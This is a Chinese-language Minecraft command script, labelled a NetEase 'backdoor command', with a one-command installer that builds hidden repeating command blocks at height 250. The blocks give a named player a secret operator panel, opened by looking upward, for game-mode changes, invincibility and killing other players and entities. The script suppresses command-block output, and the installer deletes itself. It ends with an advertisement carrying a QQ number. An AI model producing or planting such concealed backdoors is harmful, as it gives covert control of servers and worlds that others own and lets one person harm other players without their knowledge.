标题下方:启用栏

创造 生存 观察者 
无敌化(抗性5)  弹射物清除(永恒附加到里面) 效果清除 (非玩家/非主人)实体删除 

网易后门指令(给名叫红阳的人添加标签)

1 2 3 4 5/6 7 8/9 
/tag 红阳 add op0921
scoreboard players enable @a[tag=op0921] opsd21
scoreboard players set @a[x_rotation=-89..90] time2990 0

scoreboard objectives add time2990 dummy
/scoreboard objectives add opsd21 trigger
/tag @p add op0921
forceload add ~6 ~6 ~ ~
/gamerule commandBlockOutput false
/say 使用方法；将头往天上看打开面板。请支持红阳正版，装13封顶。99；2788846877


tellraw @a[scores={time2990=0},x_rotation=-90] [{"text":"OP设定栏"},{"text":"观察者","color":"aqua","clickEvent":{"action":"run_command","value":"/trigger opsd21 set 1"}},{"text":"生存","color":"aqua","clickEvent":{"action":"run_command","value":"/trigger opsd21 set 2"}},{"text":"创造","color":"aqua","clickEvent":{"action":"run_command","value":"/trigger opsd21 set 3"}},{"text":"无敌化","color":"aqua","clickEvent":{"action":"run_command","value":"/trigger opsd21 set 4"}},{"text":"开启","color":"red","clickEvent":{"action":"run_command","value":"/trigger opsd21 set 5"}},{"text":"关闭","color":"green","clickEvent":{"action":"run_command","value":"/trigger opsd21 set 6"}},{"text":"弹射物删除"},{"text":"附近实体效果删除","color":"aqua","clickEvent":{"action":"run_command","value":"/trigger opsd21 set 7"}},{"text":"非玩家","color":"green","clickEvent":{"action":"run_command","value":"/trigger opsd21 set 8"}},{"text":"非主人","color":"red","clickEvent":{"action":"run_command","value":"/trigger opsd21 set 9"}},{"text":"型删除实体"}]

scoreboard players set @a time2990 1



execute as @a[scores={opsd21=1}] run gamemode spectator @s

scoreboard players set @a opsd21 0

execute as @a[scores={opsd21=2}] run gamemode survival @s

scoreboard players set @a opsd21 0

execute as @a[scores={opsd21=3}] run gamemode creative @s

scoreboard players set @a opsd21 0



execute as @a[scores={opsd21=4}] run effect give @s minecraft:resistance 99999 4 true

scoreboard players set @a opsd21 0

execute as @a[scores={opsd21=5}] run summon minecraft:armor_stand ~ ~1 ~ {Tags:["opsd5"]}

scoreboard players set @a opsd21 0

execute as @e[tag=opsd5] at @a[tag=op0921] run tag @e[distance=1..3] add opsd05
execute as @e[tag=opsd5] at @a[tag=op0921] run kill @e[distance=4..7,tag=!opsd05,tag=!opsd5]

execute as @a[scores={opsd21=6}] run kill @e[tag=opsd5]

scoreboard players set @a opsd21 0

execute at @a[scores={opsd21=7}] run effect clear @e[distance=..5]

scoreboard players set @a opsd21 0

execute as @a[scores={opsd21=8}] run kill @e[type=!player,tag=!opsd5]

scoreboard players set @a opsd21 0

execute as @a[scores={opsd21=9}] run kill @e[tag=!opsd5,tag=!op0921]

scoreboard players set @a opsd21 0

/setblock ~1 250 ~ minecraft:repeating_command_block[conditional=false,facing=west]{auto:1b,Command:"tellraw @a[scores={time2990=0},x_rotation=-90] [{\\"text\\":\\"OP设定栏\\"},{\\"text\\":\\"观察者\\",\\"color\\":\\"aqua\\",\\"clickEvent\\":{\\"action\\":\\"run_command\\",\\"value\\":\\"/trigger opsd21 set 1\\"}},{\\"text\\":\\"生存\\",\\"color\\":\\"aqua\\",\\"clickEvent\\":{\\"action\\":\\"run_command\\",\\"value\\":\\"/trigger opsd21 set 2\\"}},{\\"text\\":\\"创造\\",\\"color\\":\\"aqua\\",\\"clickEvent\\":{\\"action\\":\\"run_command\\",\\"value\\":\\"/trigger opsd21 set 3\\"}},{\\"text\\":\\"无敌化\\",\\"color\\":\\"aqua\\",\\"clickEvent\\":{\\"action\\":\\"run_command\\",\\"value\\":\\"/trigger opsd21 set 4\\"}},{\\"text\\":\\"开启\\",\\"color\\":\\"red\\",\\"clickEvent\\":{\\"action\\":\\"run_command\\",\\"value\\":\\"/trigger opsd21 set 5\\"}},{\\"text\\":\\"关闭\\",\\"color\\":\\"green\\",\\"clickEvent\\":{\\"action\\":\\"run_command\\",\\"value\\":\\"/trigger opsd21 set 6\\"}},{\\"text\\":\\"弹射物删除\\"},{\\"text\\":\\"附近实体效果删除\\",\\"color\\":\\"aqua\\",\\"clickEvent\\":{\\"action\\":\\"run_command\\",\\"value\\":\\"/trigger opsd21 set 7\\"}},{\\"text\\":\\"非玩家\\",\\"color\\":\\"green\\",\\"clickEvent\\":{\\"action\\":\\"run_command\\",\\"value\\":\\"/trigger opsd21 set 8\\"}},{\\"text\\":\\"非主人\\",\\"color\\":\\"red\\",\\"clickEvent\\":{\\"action\\":\\"run_command\\",\\"value\\":\\"/trigger opsd21 set 9\\"}},{\\"text\\":\\"型删除实体\\"}]"}
/setblock ~ 250 ~ minecraft:chain_command_block[conditional=true,facing=west]{auto:1b,Command:"scoreboard players set @a time2990 1
"}
/setblock ~1 250 ~1 minecraft:repeating_command_block[conditional=false,facing=west]{auto:1b,Command:"execute as @a[scores={opsd21=1}] run gamemode spectator @s"}
/setblock ~ 250 ~1 minecraft:chain_command_block[conditional=true,facing=west]{auto:1b,Command:"scoreboard players set @a opsd21 0"}
/setblock ~1 250 ~2 minecraft:repeating_command_block[conditional=false,facing=west]{auto:1b,Command:"execute as @a[scores={opsd21=2}] run gamemode survival @s"}
/setblock ~ 250 ~2 minecraft:chain_command_block[conditional=true,facing=west]{auto:1b,Command:"scoreboard players set @a opsd21 0"}
/setblock ~1 250 ~3 minecraft:repeating_command_block[conditional=false,facing=west]{auto:1b,Command:"execute as @a[scores={opsd21=3}] run gamemode creative @s"}
/setblock ~ 250 ~3 minecraft:chain_command_block[conditional=true,facing=west]{auto:1b,Command:"scoreboard players set @a opsd21 0"}
/setblock ~1 250 ~4 minecraft:repeating_command_block[conditional=false,facing=west]{auto:1b,Command:"execute as @a[scores={opsd21=4}] run effect give @s minecraft:resistance 99999 4 true"}
/setblock ~ 250 ~4 minecraft:chain_command_block[conditional=true,facing=west]{auto:1b,Command:"scoreboard players set @a opsd21 0"}
/setblock ~1 251 ~ minecraft:repeating_command_block[conditional=false,facing=west]{auto:1b,Command:"execute as @a[scores={opsd21=5}] run summon minecraft:armor_stand ~ ~1 ~ {Tags:["opsd5"]}"}
/setblock ~ 251 ~ minecraft:chain_command_block[conditional=true,facing=west]{auto:1b,Command:"scoreboard players set @a opsd21 0"}
/setblock ~1 251 ~1 minecraft:repeating_command_block[conditional=false,facing=west]{auto:1b,Command:"execute as @a[scores={opsd21=6}] run kill @e[tag=opsd5]"}
/setblock ~ 251 ~1 minecraft:chain_command_block[conditional=true,facing=west]{auto:1b,Command:"scoreboard players set @a opsd21 0"}
/setblock ~1 251 ~2 minecraft:repeating_command_block[conditional=false,facing=west]{auto:1b,Command:"execute at @a[scores={opsd21=7}] run effect clear @e[distance=..5]"}
/setblock ~ 251 ~2 minecraft:chain_command_block[conditional=true,facing=west]{auto:1b,Command:"scoreboard players set @a opsd21 0"}
/setblock ~1 251 ~3 minecraft:repeating_command_block[conditional=false,facing=west]{auto:1b,Command:"execute as @a[scores={opsd21=8}] run kill @e[type=!player,tag=!opsd5]"}
/setblock ~ 251 ~3 minecraft:chain_command_block[conditional=true,facing=west]{auto:1b,Command:"scoreboard players set @a opsd21 0"}
/setblock ~1 251 ~4 minecraft:repeating_command_block[conditional=false,facing=west]{auto:1b,Command:"execute as @a[scores={opsd21=9}] run kill @e[tag=!opsd5,tag=!op0921]"}
/setblock ~ 251 ~4 minecraft:chain_command_block[conditional=true,facing=west]{auto:1b,Command:"scoreboard players set @a opsd21 0"}


/setblock ~ 252 ~ minecraft:chain_command_block[conditional=true,facing=west]{auto:1b,Command:"tag 红阳 add op0921"}
/setblock ~ 252 ~1 minecraft:chain_command_block[conditional=true,facing=west]{auto:1b,Command:"scoreboard players enable @a[tag=op0921] opsd21"}
/setblock ~ 252 ~2 minecraft:repeating_command_block[conditional=false,facing=west]{auto:1b,Command:"scoreboard players set @a[x_rotation=-89..90] time2990 0"}
/setblock ~ 252 ~3 minecraft:chain_command_block[conditional=true,facing=west]{auto:1b,Command:"execute as @e[tag=opsd5] at @a[tag=op0921] run tag @e[distance=1..3] add opsd05"}
/setblock ~ 252 ~4 minecraft:chain_command_block[conditional=true,facing=west]{auto:1b,Command:"execute as @e[tag=opsd5] at @a[tag=op0921] run kill @e[distance=4..7,tag=!opsd05,tag=!opsd5]"}


/setblock 4 66 -5 minecraft:command_block[conditional=false,facing=up]{conditionMet:1b,auto:1b,CustomName:'{"text":"@"}',powered:0b,Command:"summon falling_block ~ ~1 ~ {Time:1,BlockState:{Name:redstone_block},Passengers:[{id:armor_stand,Health:0,Passengers:[{id:falling_block,Time:99,BlockState:{Name:activator_rail},Passengers:[{id:command_block_minecart,Command:'scoreboard objectives add time2990 dummy'},{id:command_block_minecart,Command:'gamerule commandBlockOutput false'},{id:command_block_minecart,Command:'scoreboard objectives add opsd21 trigger'},{id:command_block_minecart,Command:'tag @p add op0921'},{id:command_block_minecart,Command:'forceload add ~6 ~6 ~ ~'},{id:command_block_minecart,Command:'say 使用方法；将头往天上看打开面板。请支持红阳正版，装13封顶。99；2788846877'},{id:command_block_minecart,Command:'setblock ~1 250 ~ minecraft:repeating_command_block[conditional=false,facing=west]{auto:1b,Command:\"tellraw @a[scores={time2990=0},x_rotation=-90] [{\\\\\"text\\\\\":\\\\\"OP设定栏\\\\\"},{\\\\\"text\\\\\":\\\\\"观察者\\\\\",\\\\\"color\\\\\":\\\\\"aqua\\\\\",\\\\\"clickEvent\\\\\":{\\\\\"action\\\\\":\\\\\"run_command\\\\\",\\\\\"value\\\\\":\\\\\"/trigger opsd21 set 1\\\\\"}},{\\\\\"text\\\\\":\\\\\"生存\\\\\",\\\\\"color\\\\\":\\\\\"aqua\\\\\",\\\\\"clickEvent\\\\\":{\\\\\"action\\\\\":\\\\\"run_command\\\\\",\\\\\"value\\\\\":\\\\\"/trigger opsd21 set 2\\\\\"}},{\\\\\"text\\\\\":\\\\\"创造\\\\\",\\\\\"color\\\\\":\\\\\"aqua\\\\\",\\\\\"clickEvent\\\\\":{\\\\\"action\\\\\":\\\\\"run_command\\\\\",\\\\\"value\\\\\":\\\\\"/trigger opsd21 set 3\\\\\"}},{\\\\\"text\\\\\":\\\\\"无敌化\\\\\",\\\\\"color\\\\\":\\\\\"aqua\\\\\",\\\\\"clickEvent\\\\\":{\\\\\"action\\\\\":\\\\\"run_command\\\\\",\\\\\"value\\\\\":\\\\\"/trigger opsd21 set 4\\\\\"}},{\\\\\"text\\\\\":\\\\\"开启\\\\\",\\\\\"color\\\\\":\\\\\"red\\\\\",\\\\\"clickEvent\\\\\":{\\\\\"action\\\\\":\\\\\"run_command\\\\\",\\\\\"value\\\\\":\\\\\"/trigger opsd21 set 5\\\\\"}},{\\\\\"text\\\\\":\\\\\"关闭\\\\\",\\\\\"color\\\\\":\\\\\"green\\\\\",\\\\\"clickEvent\\\\\":{\\\\\"action\\\\\":\\\\\"run_command\\\\\",\\\\\"value\\\\\":\\\\\"/trigger opsd21 set 6\\\\\"}},{\\\\\"text\\\\\":\\\\\"弹射物删除\\\\\"},{\\\\\"text\\\\\":\\\\\"附近实体效果删除\\\\\",\\\\\"color\\\\\":\\\\\"aqua\\\\\",\\\\\"clickEvent\\\\\":{\\\\\"action\\\\\":\\\\\"run_command\\\\\",\\\\\"value\\\\\":\\\\\"/trigger opsd21 set 7\\\\\"}},{\\\\\"text\\\\\":\\\\\"非玩家\\\\\",\\\\\"color\\\\\":\\\\\"green\\\\\",\\\\\"clickEvent\\\\\":{\\\\\"action\\\\\":\\\\\"run_command\\\\\",\\\\\"value\\\\\":\\\\\"/trigger opsd21 set 8\\\\\"}},{\\\\\"text\\\\\":\\\\\"非主人\\\\\",\\\\\"color\\\\\":\\\\\"red\\\\\",\\\\\"clickEvent\\\\\":{\\\\\"action\\\\\":\\\\\"run_command\\\\\",\\\\\"value\\\\\":\\\\\"/trigger opsd21 set 9\\\\\"}},{\\\\\"text\\\\\":\\\\\"型删除实体\\\\\"}]\"}/setblock ~ 250 ~ minecraft:chain_command_block[conditional=true,facing=west]{auto:1b,Command:\"scoreboard players set @a time2990 1\"}'},{id:command_block_minecart,Command:'setblock ~ 250 ~ minecraft:chain_command_block[conditional=true,facing=west]{auto:1b,Command:\"scoreboard players set @a time2990 1\"}'},{id:command_block_minecart,Command:'setblock ~1 250 ~1 minecraft:repeating_command_block[conditional=false,facing=west]{auto:1b,Command:\"execute as @a[scores={opsd21=1}] run gamemode spectator @s\"}'},{id:command_block_minecart,Command:'setblock ~ 250 ~1 minecraft:chain_command_block[conditional=true,facing=west]{auto:1b,Command:\"scoreboard players set @a opsd21 0\"}'},{id:command_block_minecart,Command:'setblock ~1 250 ~2 minecraft:repeating_command_block[conditional=false,facing=west]{auto:1b,Command:\"execute as @a[scores={opsd21=2}] run gamemode survival @s\"}'},{id:command_block_minecart,Command:'setblock ~ 250 ~2 minecraft:chain_command_block[conditional=true,facing=west]{auto:1b,Command:\"scoreboard players set @a opsd21 0\"}'},{id:command_block_minecart,Command:'setblock ~1 250 ~3 minecraft:repeating_command_block[conditional=false,facing=west]{auto:1b,Command:\"execute as @a[scores={opsd21=3}] run gamemode creative @s\"}'},{id:command_block_minecart,Command:'setblock ~ 250 ~3 minecraft:chain_command_block[conditional=true,facing=west]{auto:1b,Command:\"scoreboard players set @a opsd21 0\"}'},{id:command_block_minecart,Command:'setblock ~1 250 ~4 minecraft:repeating_command_block[conditional=false,facing=west]{auto:1b,Command:\"execute as @a[scores={opsd21=4}] run effect give @s minecraft:resistance 99999 4 true\"}'},{id:command_block_minecart,Command:'setblock ~ 250 ~4 minecraft:chain_command_block[conditional=true,facing=west]{auto:1b,Command:\"scoreboard players set @a opsd21 0\"}'},{id:command_block_minecart,Command:'setblock ~1 251 ~ minecraft:repeating_command_block[conditional=false,facing=west]{auto:1b,Command:\"execute as @a[scores={opsd21=5}] run summon minecraft:armor_stand ~ ~1 ~ {Tags:[\\\\\"opsd5\"\\\\]}\"}'},{id:command_block_minecart,Command:'setblock ~ 251 ~ minecraft:chain_command_block[conditional=true,facing=west]{auto:1b,Command:\"scoreboard players set @a opsd21 0\"}'},{id:command_block_minecart,Command:'setblock ~1 251 ~1 minecraft:repeating_command_block[conditional=false,facing=west]{auto:1b,Command:\"execute as @a[scores={opsd21=6}] run kill @e[tag=opsd5]\"}'},{id:command_block_minecart,Command:'setblock ~ 251 ~1 minecraft:chain_command_block[conditional=true,facing=west]{auto:1b,Command:\"scoreboard players set @a opsd21 0\"}'},{id:command_block_minecart,Command:'setblock ~1 251 ~2 minecraft:repeating_command_block[conditional=false,facing=west]{auto:1b,Command:\"execute at @a[scores={opsd21=7}] run effect clear @e[distance=..5]\"}'},{id:command_block_minecart,Command:'setblock ~ 251 ~2 minecraft:chain_command_block[conditional=true,facing=west]{auto:1b,Command:\"scoreboard players set @a opsd21 0\"}'},{id:command_block_minecart,Command:'setblock ~1 251 ~3 minecraft:repeating_command_block[conditional=false,facing=west]{auto:1b,Command:\"execute as @a[scores={opsd21=8}] run kill @e[type=!player,tag=!opsd5]\"}'},{id:command_block_minecart,Command:'setblock ~ 251 ~3 minecraft:chain_command_block[conditional=true,facing=west]{auto:1b,Command:\"scoreboard players set @a opsd21 0\"}'},{id:command_block_minecart,Command:'setblock ~1 251 ~4 minecraft:repeating_command_block[conditional=false,facing=west]{auto:1b,Command:\"execute as @a[scores={opsd21=9}] run kill @e[tag=!opsd5,tag=!op0921]\"}'},{id:command_block_minecart,Command:'setblock ~ 251 ~4 minecraft:chain_command_block[conditional=true,facing=west]{auto:1b,Command:\"scoreboard players set @a opsd21 0\"}'},{id:command_block_minecart,Command:'setblock ~ 252 ~ minecraft:chain_command_block[conditional=true,facing=west]{auto:1b,Command:\"tag 红阳 add op0921\"}'},{id:command_block_minecart,Command:'setblock ~ 252 ~1 minecraft:chain_command_block[conditional=true,facing=west]{auto:1b,Command:\"scoreboard players enable @a[tag=op0921] opsd21\"}'},{id:command_block_minecart,Command:'setblock ~ 252 ~2 minecraft:repeating_command_block[conditional=false,facing=west]{auto:1b,Command:\"scoreboard players set @a[x_rotation=-89..90] time2990 0\"}'},{id:command_block_minecart,Command:'setblock ~ 252 ~3 minecraft:chain_command_block[conditional=true,facing=west]{auto:1b,Command:\"execute as @e[tag=opsd5] at @a[tag=op0921] run tag @e[distance=1..3] add opsd05\"}'},{id:command_block_minecart,Command:'setblock ~ 252 ~4 minecraft:chain_command_block[conditional=true,facing=west]{auto:1b,Command:\"execute as @e[tag=opsd5] at @a[tag=op0921] run kill @e[distance=4..7,tag=!opsd05,tag=!opsd5]\"}'},{id:command_block_minecart,Command:'setblock ~ ~1 ~ command_block{auto:1,Command:\"fill ~ ~ ~ ~ ~-3 ~ air\"}'},{id:command_block_minecart,Command:'kill @e[type=command_block_minecart,distance=..1]'}]}]}]}",SuccessCount:0,TrackOutput:1b,UpdateLastExecution:1b}

summon falling_block ~ ~1 ~ {Time:1,BlockState:{Name:redstone_block},Passengers:[
{id:armor_stand,Health:0,Passengers:[
{id:falling_block,Time:99,BlockState:{Name:activator_rail},Passengers:[
{id:command_block_minecart,Command:'scoreboard objectives add time2990 dummy'},{id:command_block_minecart,Command:'gamerule commandBlockOutput false'},{id:command_block_minecart,Command:'scoreboard objectives add opsd21 trigger'},{id:command_block_minecart,Command:'tag @p add op0921'},{id:command_block_minecart,Command:'forceload add ~6 ~6 ~ ~'},{id:command_block_minecart,Command:'say 使用方法；将头往天上看打开面板。请支持红阳正版，装13封顶。99；2788846877'},{id:command_block_minecart,Command:'setblock ~1 250 ~ minecraft:repeating_command_block[conditional=false,facing=west]{auto:1b,Command:"tellraw @a[scores={time2990=0},x_rotation=-90] [{\\"text\\":\\"OP设定栏\\"},{\\"text\\":\\"观察者\\",\\"color\\":\\"aqua\\",\\"clickEvent\\":{\\"action\\":\\"run_command\\",\\"value\\":\\"/trigger opsd21 set 1\\"}},{\\"text\\":\\"生存\\",\\"color\\":\\"aqua\\",\\"clickEvent\\":{\\"action\\":\\"run_command\\",\\"value\\":\\"/trigger opsd21 set 2\\"}},{\\"text\\":\\"创造\\",\\"color\\":\\"aqua\\",\\"clickEvent\\":{\\"action\\":\\"run_command\\",\\"value\\":\\"/trigger opsd21 set 3\\"}},{\\"text\\":\\"无敌化\\",\\"color\\":\\"aqua\\",\\"clickEvent\\":{\\"action\\":\\"run_command\\",\\"value\\":\\"/trigger opsd21 set 4\\"}},{\\"text\\":\\"开启\\",\\"color\\":\\"red\\",\\"clickEvent\\":{\\"action\\":\\"run_command\\",\\"value\\":\\"/trigger opsd21 set 5\\"}},{\\"text\\":\\"关闭\\",\\"color\\":\\"green\\",\\"clickEvent\\":{\\"action\\":\\"run_command\\",\\"value\\":\\"/trigger opsd21 set 6\\"}},{\\"text\\":\\"弹射物删除\\"},{\\"text\\":\\"附近实体效果删除\\",\\"color\\":\\"aqua\\",\\"clickEvent\\":{\\"action\\":\\"run_command\\",\\"value\\":\\"/trigger opsd21 set 7\\"}},{\\"text\\":\\"非玩家\\",\\"color\\":\\"green\\",\\"clickEvent\\":{\\"action\\":\\"run_command\\",\\"value\\":\\"/trigger opsd21 set 8\\"}},{\\"text\\":\\"非主人\\",\\"color\\":\\"red\\",\\"clickEvent\\":{\\"action\\":\\"run_command\\",\\"value\\":\\"/trigger opsd21 set 9\\"}},{\\"text\\":\\"型删除实体\\"}]"}'},{id:command_block_minecart,Command:'setblock ~ 250 ~ minecraft:chain_command_block[conditional=true,facing=west]{auto:1b,Command:"scoreboard players set @a time2990 1
"}'},{id:command_block_minecart,Command:'setblock ~1 250 ~1 minecraft:repeating_command_block[conditional=false,facing=west]{auto:1b,Command:"execute as @a[scores={opsd21=1}] run gamemode spectator @s"}'},{id:command_block_minecart,Command:'setblock ~ 250 ~1 minecraft:chain_command_block[conditional=true,facing=west]{auto:1b,Command:"scoreboard players set @a opsd21 0"}'},{id:command_block_minecart,Command:'setblock ~1 250 ~2 minecraft:repeating_command_block[conditional=false,facing=west]{auto:1b,Command:"execute as @a[scores={opsd21=2}] run gamemode survival @s"}'},{id:command_block_minecart,Command:'setblock ~ 250 ~2 minecraft:chain_command_block[conditional=true,facing=west]{auto:1b,Command:"scoreboard players set @a opsd21 0"}'},{id:command_block_minecart,Command:'setblock ~1 250 ~3 minecraft:repeating_command_block[conditional=false,facing=west]{auto:1b,Command:"execute as @a[scores={opsd21=3}] run gamemode creative @s"}'},{id:command_block_minecart,Command:'setblock ~ 250 ~3 minecraft:chain_command_block[conditional=true,facing=west]{auto:1b,Command:"scoreboard players set @a opsd21 0"}'},{id:command_block_minecart,Command:'setblock ~1 250 ~4 minecraft:repeating_command_block[conditional=false,facing=west]{auto:1b,Command:"execute as @a[scores={opsd21=4}] run effect give @s minecraft:resistance 99999 4 true"}'},{id:command_block_minecart,Command:'setblock ~ 250 ~4 minecraft:chain_command_block[conditional=true,facing=west]{auto:1b,Command:"scoreboard players set @a opsd21 0"}'},{id:command_block_minecart,Command:'setblock ~1 251 ~ minecraft:repeating_command_block[conditional=false,facing=west]{auto:1b,Command:"execute as @a[scores={opsd21=5}] run summon minecraft:armor_stand ~ ~1 ~ {Tags:[\\"opsd5\\"]}"}'},{id:command_block_minecart,Command:'setblock ~ 251 ~ minecraft:chain_command_block[conditional=true,facing=west]{auto:1b,Command:"scoreboard players set @a opsd21 0"}'},{id:command_block_minecart,Command:'setblock ~1 251 ~1 minecraft:repeating_command_block[conditional=false,facing=west]{auto:1b,Command:"execute as @a[scores={opsd21=6}] run kill @e[tag=opsd5]"}'},{id:command_block_minecart,Command:'setblock ~ 251 ~1 minecraft:chain_command_block[conditional=true,facing=west]{auto:1b,Command:"scoreboard players set @a opsd21 0"}'},{id:command_block_minecart,Command:'setblock ~1 251 ~2 minecraft:repeating_command_block[conditional=false,facing=west]{auto:1b,Command:"execute at @a[scores={opsd21=7}] run effect clear @e[distance=..5]"}'},{id:command_block_minecart,Command:'setblock ~ 251 ~2 minecraft:chain_command_block[conditional=true,facing=west]{auto:1b,Command:"scoreboard players set @a opsd21 0"}'},{id:command_block_minecart,Command:'setblock ~1 251 ~3 minecraft:repeating_command_block[conditional=false,facing=west]{auto:1b,Command:"execute as @a[scores={opsd21=8}] run kill @e[type=!player,tag=!opsd5]"}'},{id:command_block_minecart,Command:'setblock ~ 251 ~3 minecraft:chain_command_block[conditional=true,facing=west]{auto:1b,Command:"scoreboard players set @a opsd21 0"}'},{id:command_block_minecart,Command:'setblock ~1 251 ~4 minecraft:repeating_command_block[conditional=false,facing=west]{auto:1b,Command:"execute as @a[scores={opsd21=9}] run kill @e[tag=!opsd5,tag=!op0921]"}'},{id:command_block_minecart,Command:'setblock ~ 251 ~4 minecraft:chain_command_block[conditional=true,facing=west]{auto:1b,Command:"scoreboard players set @a opsd21 0"}'},{id:command_block_minecart,Command:'setblock ~ 252 ~ minecraft:repeating_command_block[facing=west]{auto:1b,Command:"tag 红阳 add op0921"}'},{id:command_block_minecart,Command:'setblock ~ 252 ~1 minecraft:repeating_command_block[facing=west]{auto:1b,Command:"scoreboard players enable @a[tag=op0921] opsd21"}'},{id:command_block_minecart,Command:'setblock ~ 252 ~2 minecraft:repeating_command_block[conditional=false,facing=west]{auto:1b,Command:"scoreboard players set @a[x_rotation=-89..90] time2990 0"}'},{id:command_block_minecart,Command:'setblock ~ 252 ~3 minecraft:repeating_command_block[facing=west]{auto:1b,Command:"execute as @e[tag=opsd5] at @a[tag=op0921] run tag @e[distance=1..3] add opsd05"}'},{id:command_block_minecart,Command:'setblock ~ 252 ~4 minecraft:repeating_command_block[facing=west]{auto:1b,Command:"execute as @e[tag=opsd5] at @a[tag=op0921] run kill @e[distance=4..7,tag=!opsd05,tag=!opsd5]"}'},{id:command_block_minecart,Command:'setblock ~ ~1 ~ command_block{auto:1,Command:"fill ~ ~ ~ ~ ~-3 ~ air"}'},
{id:command_block_minecart,Command:'kill @e[type=command_block_minecart,distance=..1]'}]}]}]}